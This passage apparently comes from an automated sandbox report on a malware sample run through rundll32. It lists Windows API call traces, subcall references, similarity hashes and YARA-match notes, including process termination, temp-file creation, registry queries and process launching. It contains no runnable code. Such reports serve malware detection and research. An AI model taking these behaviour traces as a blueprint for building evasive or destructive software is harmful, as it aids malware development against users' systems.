                              • strcpy.NTDLL ref: 0594EA5F
                              • lstrcat.KERNEL32(00000000,?), ref: 0594EA6A
                                • Part of subcall function 0594C32E: lstrlen.KERNEL32(?,?,?,00000000,?,0594EA79,00000000,?,?,00000000,0593E842,00000000,05F3C310), ref: 0594C33F
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,0593E842,00000000,05F3C310), ref: 0594EA87
                                • Part of subcall function 0593930C: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,0594EA93,00000000,?,00000000,0593E842,00000000,05F3C310), ref: 05939316
                                • Part of subcall function 0593930C: _snprintf.NTDLL ref: 05939374
                              Similarity
                              • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                              • String ID: =
                              • API String ID: 2864389247-1428090586
                              • Opcode ID: 4d2dce234c1e222b49835c93328bc3e295095df9350a7bdc09d999a96470a4e1
                              • Instruction ID: 992d6eef006d75a4ccdf349acb57db9dcade96b17228a76dbeb513ade8d1215a
                              • Instruction Fuzzy Hash: 73112533A04224BB8F22BBB89C8DC6E3BADBFC95643060015F90597200CF78ED024BE1

                              APIs
                              • SwitchToThread.KERNEL32(?,?,0594E846), ref: 05939EAD
                              • CloseHandle.KERNEL32(?,?,0594E846), ref: 05939EB9
                              • CloseHandle.KERNEL32(00000000,76CDF720,?,05933576,00000000,?,?,?,0594E846), ref: 05939ECB
                              • memset.NTDLL ref: 05939EE2
                              • memset.NTDLL ref: 05939EF9
                              • memset.NTDLL ref: 05939F10
                              • memset.NTDLL ref: 05939F27
                              Similarity
                              • API ID: memset$CloseHandle$SwitchThread
                              • String ID:
                              • API String ID: 3699883640-0
                              • Opcode ID: 750afdd50caf63559812c3dea0f1c43c745d9e6632df48685a2ff15bdd0b70e8
                              • Instruction ID: 6fe729c25448fbfc2b70005b6fb27bf66d4049d5d42e43e89e5354c2f033692d
                              • Instruction Fuzzy Hash: 1A11AB31A59610ABD7117725AC0FE4BBFADEFD57027890225F409A2100CF566DA0C7E9

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0593CAAB
                              • wcstombs.NTDLL ref: 0593CABC
                                • Part of subcall function 05934963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,059370EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05934975
                                • Part of subcall function 05934963: StrChrA.SHLWAPI(?,00000020,?,00000000,059370EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05934984
                              • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 0593CADD
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0593CAEC
                              • CloseHandle.KERNEL32(00000000), ref: 0593CAF3
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0593CB02
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0593CB12
                              Similarity
                              • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                              • String ID:
                              • API String ID: 417118235-0
                              • Opcode ID: 70b1a6c64665628442045fcd1aa9df21cff58ccd6e467e987be2a100d67120a4
                              • Instruction ID: eb0b2431ae393f7f1a974c82558e4e5f3efd4ce7305a8fad11e2d82825a8c165
                              • Instruction Fuzzy Hash: 0111EF31118715FBE7109F64DC4ABAABFACFF04312F000020F90AA6181CBB1AC64CBE0

                              APIs
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                              • lstrcpy.KERNEL32(-000000FC,00000000), ref: 059431CD
                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,059513E7,?,?,00000000,?,05940E77,00000000), ref: 059431DF
                              • GetTickCount.KERNEL32 ref: 059431EA
                              • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,059513E7,?,?,00000000,?,05940E77,00000000), ref: 059431F6
                              • lstrcpy.KERNEL32(00000000), ref: 05943210
                              Similarity
                              • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                              • String ID: \Low
                              • API String ID: 1629304206-4112222293
                              • Opcode ID: 6032eb5a0f20b93d2944f202bf61f39a7d8dfa1a961ba470b24bee2abc99e10b
                              • Instruction ID: 77bca659fb6ea3e4aa5994442b7b375c29743daf9f04e80e8529ca3e8e55bfb0
                              • Instruction Fuzzy Hash: FC01DE31205B24ABDA216BB59D89F6FBB9CBF46651B060820F506D3181CF28DD40CBF4

                              APIs
                              • wsprintfA.USER32 ref: 05936F64
                              • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 05936F76
                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 05936FA0
                              • WaitForMultipleObjects.KERNEL32(00000002,05942EB3,00000000,000000FF), ref: 05936FB3
                              • CloseHandle.KERNEL32(05942EB3), ref: 05936FBC
                              Similarity
                              • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                              • String ID: 0x%08X
                              • API String ID: 603522830-3182613153
                              • Opcode ID: fa7dfc2ac3c1dab037587a518e8923732743919ec4ed57d12f84af8eef5877fd
                              • Instruction ID: c74a6b574f7e102584977d2bfd37584d5c2dc612dd61e73a568aa6a3ca61fdbe
                              • Instruction Fuzzy Hash: 88011A71909229BBDB109BA4DC4ADEFBF7CEF45360F014118F916E2196EB70A611CBA0

                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • GetLastError.KERNEL32(?,?,?,00001000,?,0595A2F4,76CDF750), ref: 0594D38B
                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,0595A2F4,76CDF750), ref: 0594D410
                              • CloseHandle.KERNEL32(00000000,?,0595A2F4,76CDF750), ref: 0594D42A
                              • OpenProcess.KERNEL32(00100000,00000000,00000000,?,0595A2F4,76CDF750), ref: 0594D45F
                                • Part of subcall function 0593D6B0: RtlReAllocateHeap.NTDLL(00000000,?,?,05935546), ref: 0593D6C0
                              • WaitForSingleObject.KERNEL32(?,00000064,?,0595A2F4,76CDF750), ref: 0594D4E1
                              • CloseHandle.KERNEL32(F0FFC983,?,0595A2F4,76CDF750), ref: 0594D508
                              Similarity
                              • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                              • String ID:
                              • API String ID: 3115907006-0
                              • Opcode ID: 49a6b4bb76ef9732685ca584c837fde8a59a1cfe001ecbf53d04e3e8eab2308e
                              • Instruction ID: 1ab61bbacb1119095617c2f2a50ad1b266e4add6b3d53114fd249353a2eda10e
                              • Instruction Fuzzy Hash: D2811575A04319EFCB11DFA4C884AADBBB5FF08354F158459E805AB250D730AD50CFA0

                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • FileTimeToLocalFileTime.KERNEL32(00000000,05942702), ref: 0594B2DA
                              • FileTimeToSystemTime.KERNEL32(05942702,?), ref: 0594B2E8
                              • lstrlenW.KERNEL32(00000010), ref: 0594B2F8
                              • lstrlenW.KERNEL32(00000218), ref: 0594B304
                              • FileTimeToLocalFileTime.KERNEL32(00000008,05942702), ref: 0594B3F1
                              • FileTimeToSystemTime.KERNEL32(05942702,?), ref: 0594B3FF
                              Similarity
                              • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                              • String ID:
                              • API String ID: 1122361434-0
                              • Opcode ID: 22ba76c213355619bb1c0d0e1c442919e00cd8bd6cc334c5b9c8435fe7d9ebd6
                              • Instruction ID: 92e4ef08a86d0bd11bcdf7881f3b14b0aef6652c6f6806d1a4ce0810043bcda8
                              • Instruction Fuzzy Hash: 7F710871A0020AABCF50DBA9C885EEEB7FDFB48304F144566E505E7240EB38EA55DB60

                              APIs
                              • RtlImageNtHeader.NTDLL(?), ref: 0593E428
                                • Part of subcall function 05947A3E: lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0593E448,?), ref: 05947A6A
                                • Part of subcall function 05947A3E: RtlAllocateHeap.NTDLL(00000000,?), ref: 05947A7C
                                • Part of subcall function 05947A3E: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0593E448,?), ref: 05947A99
                                • Part of subcall function 05947A3E: lstrlenW.KERNEL32(00000000,?,?,0593E448,?), ref: 05947AA5
                                • Part of subcall function 05947A3E: HeapFree.KERNEL32(00000000,00000000,?,?,0593E448,?), ref: 05947AB9
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 0593E460
                              • CloseHandle.KERNEL32(?), ref: 0593E46E
                              • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 0593E547
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0593E556
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 0593E569
                              Similarity
                              • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                              • String ID:
                              • API String ID: 1719504581-0
                              • Opcode ID: 999495891c69b9b70f9163a2116e321dc08e9abf3cadddc35d1c9ef10535982e
                              • Instruction ID: 1ac0dd938cedf077d93f455e42c685fed397955f23901776383adfce08f4bb8e
                              • Instruction Fuzzy Hash: 1B417131614705EBDF219FA4D88AEAABF7EFF44701F014125F905A7211EB30EA65CB94

                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,?), ref: 0594D237
                              • GetLastError.KERNEL32 ref: 0594D25D
                              • SetEvent.KERNEL32(00000000), ref: 0594D270
                              • GetModuleHandleA.KERNEL32(00000000), ref: 0594D2B9
                              • memset.NTDLL ref: 0594D2CE
                              • RtlExitUserThread.NTDLL(?), ref: 0594D303
                              Similarity
                              • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                              • String ID:
                              • API String ID: 3978817377-0
                              • Opcode ID: cf523dc5f4b9b264727951ff915e8f891facfce4aea3626adbf92261ed45873b
                              • Instruction ID: a45fb786a110cb0771a020abf15494c0108887d653291183a0659466779e2f41
                              • Instruction Fuzzy Hash: 074106B5904704EFDB21DFA8D888CAABBBDFF856117644A19F94AD2100DB30AE44CF60

                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f2762cf14b54d7b57259db950a3f58b317f4754f8b704ee57ad04452244c025c
                              • Instruction ID: 8a5c27dbc27621014d210f5f0402fc4c391d35665efd8e73b6c50c433c957fff
                              • Instruction Fuzzy Hash: 3941E3B1504714DFD720AFB48889D2BBBE9FB84720B014A2DF66FC6180EB70A855CF90

                              APIs
                                • Part of subcall function 0593AE7C: lstrlen.KERNEL32(0593E448,00000000,00000000,?,?,05947A5B,?,?,?,?,0593E448,?), ref: 0593AE8B
                                • Part of subcall function 0593AE7C: mbstowcs.NTDLL ref: 0593AEA7
                              • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0593EB0D
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0594BB1D
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0594BB29
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BB71
                                • Part of subcall function 0594BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BB8C
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(0000002C), ref: 0594BBC4
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?), ref: 0594BBCC
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BBEF
                                • Part of subcall function 0594BAD1: wcscpy.NTDLL ref: 0594BC01
                              • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0593EB2E
                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0593EB5A
                                • Part of subcall function 0594BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0594BC27
                                • Part of subcall function 0594BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 0594BC5D
                                • Part of subcall function 0594BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 0594BC79
                                • Part of subcall function 0594BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0594BC92
                                • Part of subcall function 0594BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0594BCA4
                                • Part of subcall function 0594BAD1: FindClose.KERNEL32(?), ref: 0594BCB9
                                • Part of subcall function 0594BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BCCD
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(0000002C), ref: 0594BCEF
                              • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0593EB77
                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0593EB98
                              • PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0593EBAD
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                              • String ID:
                              • API String ID: 2670873185-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,00000104,05953A4E,00000000,?,?,05949BAD,?,00000005,?,00000000), ref: 0594EFBB
                              • lstrlen.KERNEL32(00000000,00000104,05953A4E,00000000,?,?,05949BAD,?,00000005), ref: 0594EFD1
                              • lstrlen.KERNEL32(?,00000104,05953A4E,00000000,?,?,05949BAD,?,00000005), ref: 0594EFE6
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0594F04B
                              • _snprintf.NTDLL ref: 0594F071
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 0594F090
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Heap$AllocateFree_snprintf
                              • String ID:
                              • API String ID: 3180502281-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0593A990
                              • CreateWaitableTimerA.KERNEL32(0595A1E8,00000001,?), ref: 0593A9AD
                              • GetLastError.KERNEL32(?,00000000,05948C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0593A9BE
                                • Part of subcall function 05951ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                                • Part of subcall function 05951ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                                • Part of subcall function 05951ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                                • Part of subcall function 05951ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593A9FE
                              • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593AA1D
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593AA33
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                              • String ID:
                              • API String ID: 1835239314-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,05947C35,00000000,?,?,?), ref: 0593F531
                              • StrChrA.SHLWAPI(00000001,00000020,?,?,?,05947C35,00000000,?,?,?), ref: 0593F542
                                • Part of subcall function 05931F0F: lstrlen.KERNEL32(?,?,00000000,00000000,?,05943D4E,00000000,?,?,00000000,00000001), ref: 05931F21
                                • Part of subcall function 05931F0F: StrChrA.SHLWAPI(?,0000000D,?,05943D4E,00000000,?,?,00000000,00000001), ref: 05931F59
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0593F582
                              • memcpy.NTDLL(00000000,?,00000007,?,?,?,05947C35,00000000), ref: 0593F5AF
                              • memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,05947C35,00000000), ref: 0593F5BE
                              • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,05947C35,00000000), ref: 0593F5D0
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memcpy$AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 1819133394-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 059504D9
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 059504EA
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 05950505
                              • GetLastError.KERNEL32 ref: 0595051B
                              • HeapFree.KERNEL32(00000000,?), ref: 0595052D
                              • HeapFree.KERNEL32(00000000,?), ref: 05950542
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                              • String ID:
                              • API String ID: 1822509305-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 0594C917
                              • _strupr.NTDLL ref: 0594C952
                              • lstrlen.KERNEL32(00000000), ref: 0594C95A
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0594C999
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0594C9A0
                              • GetLastError.KERNEL32 ref: 0594C9A8
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                              • String ID:
                              • API String ID: 110452925-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,76CDF710), ref: 0594B567
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0594B595
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0594B5A7
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0594B5CC
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594B5E7
                              • RegCloseKey.ADVAPI32(?), ref: 0594B5F1
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseFreeOpen
                              • String ID:
                              • API String ID: 170146033-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,05938EF7,?,00000000,000000FF), ref: 0593A5F8
                              • lstrlen.KERNEL32(?,?,?,?,05938EF7,?,00000000,000000FF), ref: 0593A5FF
                              • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0593A611
                              • _snprintf.NTDLL ref: 0593A637
                                • Part of subcall function 0594C01F: memset.NTDLL ref: 0594C034
                                • Part of subcall function 0594C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0594C06D
                                • Part of subcall function 0594C01F: wcstombs.NTDLL ref: 0594C077
                                • Part of subcall function 0594C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0594C0A8
                                • Part of subcall function 0594C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0593A645), ref: 0594C0D4
                                • Part of subcall function 0594C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 0594C0EA
                                • Part of subcall function 0594C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0593A645), ref: 0594C0FE
                                • Part of subcall function 0594C01F: CloseHandle.KERNEL32(?), ref: 0594C131
                                • Part of subcall function 0594C01F: CloseHandle.KERNEL32(?), ref: 0594C136
                              • _snprintf.NTDLL ref: 0593A66B
                                • Part of subcall function 0594C01F: GetLastError.KERNEL32 ref: 0594C102
                                • Part of subcall function 0594C01F: GetExitCodeProcess.KERNEL32(?,00000001), ref: 0594C122
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 0593A688
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                              • String ID:
                              • API String ID: 1481739438-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(0593261E,00000000,00000000,00000008,00000000,?,0593261E,0593988B,00000000,?), ref: 0594F7A7
                              • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 0594F7BA
                              • lstrcpy.KERNEL32(00000008,0593261E), ref: 0594F7DC
                              • GetLastError.KERNEL32(05934A0A,00000000,00000000,?,0593261E,0593988B,00000000,?), ref: 0594F805
                              • HeapFree.KERNEL32(00000000,00000000,?,0593261E,0593988B,00000000,?), ref: 0594F81D
                              • CloseHandle.KERNEL32(00000000,05934A0A,00000000,00000000,?,0593261E,0593988B,00000000,?), ref: 0594F826
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                              • String ID:
                              • API String ID: 2860611006-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                              • GetCurrentThreadId.KERNEL32 ref: 059450C4
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                              • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                              • lstrcpy.KERNEL32(00000000), ref: 05945100
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 1175089793-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05934FB8
                              • lstrlen.KERNEL32(?,?), ref: 05934FE9
                              • memcpy.NTDLL(00000008,?,00000001), ref: 05934FF8
                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 0593507A
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreelstrlenmemcpy
                              • String ID: W
                              • API String ID: 379260646-655174618
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 05945A17
                              • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 05945A84
                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 05945A8E
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: BuffersErrorFileFlushLastmemset
                              • String ID: K$P
                              • API String ID: 3817869962-420285281
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memcpy.NTDLL(?,0593DE40,00000000,?,?,?,0593DE40,?,?,?,?,?), ref: 0593D121
                              • lstrlen.KERNEL32(0593DE40,?,?,?,0593DE40,?,?,?,?,?), ref: 0593D13F
                              • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0593D1AE
                              • lstrlen.KERNEL32(0593DE40,00000000,00000000,?,?,?,0593DE40,?,?,?,?,?), ref: 0593D1CF
                              • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 0593D1E3
                              • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0593D1EC
                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0593D1FA
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlenmemcpy$FreeLocal
                              • String ID:
                              • API String ID: 1123625124-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05938669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,05932028,?), ref: 0593867A
                                • Part of subcall function 05938669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,05932028,?), ref: 05938697
                              • lstrlenW.KERNEL32(?,00000000,?,?,?), ref: 05932055
                              • lstrlenW.KERNEL32(00000008,?,?,?), ref: 0593205C
                              • lstrlenW.KERNEL32(?,?,?,?,?), ref: 0593207A
                              • lstrlen.KERNEL32(00000000,?,00000000), ref: 05932138
                              • lstrlenW.KERNEL32(?), ref: 05932143
                              • wsprintfA.USER32 ref: 05932185
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0593F3DB
                                • Part of subcall function 0593F39B: GetLastError.KERNEL32 ref: 0593F3E5
